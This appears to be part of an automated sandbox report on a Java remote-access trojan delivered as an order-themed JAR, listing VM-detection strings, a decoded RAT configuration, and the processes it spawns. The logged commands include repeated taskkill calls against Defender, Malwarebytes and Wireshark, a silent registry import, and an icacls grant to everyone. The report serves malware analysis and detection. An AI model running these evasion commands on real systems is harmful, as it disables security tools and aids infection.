        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dllJump to dropped file
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-13352
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeAPI coverage: 1.2 %
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BDescription=Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Adevicename=microsoft hyper-v virtualization infrastructure driver
        Source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVM version %s (%s, %s)VirtualMachineImpl.cRedefineClassesGetTopThreadGroupsJNI_FALSENewStringUTF;classTrack.csignaturessignature bagDeleteWeakGlobalRefclassTrack tableloaded classesAttempting to insert duplicate classKlassNodesignatureNewWeakGlobalRefloaded classes arraycommonRef.cSetTagFreeing %d (%x)
        Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843639949.0000000001614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Ljava/lang/VirtualMachineError;
        Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
        Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843639949.0000000001614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cjava/lang/VirtualMachineError
        Source: wscript.exe, 00000005.00000003.1666098782.0000000006AF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: java.exe, 00000007.00000002.2845228924.000000000542F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ADeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_
        Source: java.exe, 00000002.00000003.1625026729.0000000015352000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1664952445.0000000014EC6000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1755381709.000000000288D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
        Source: java.exe, 00000007.00000002.2843639949.00000000015EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWN
        Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004B3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /DeviceName=Microsoft Hyper-V Generation Counter
        Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_
        Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Description=Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004B3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /devicename=microsoft hyper-v generation counter
        Source: java.exe, 00000007.00000002.2845228924.000000000524C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
        Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VirtualMachineImpl.c
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Bdescription=microsoft hyper-v virtualization infrastructure driver
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeAPI call chain: ExitProcess graph end nodegraph_6-13354
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A92C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_73A92C97
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A945FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_73A945FB
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A92C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_73A92C97
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A91244 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_73A91244
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeMemory protected: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Excessive usage of taskkill to terminate processes
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.jsJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.classJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /eJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exeJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.regJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:ListJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.regJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
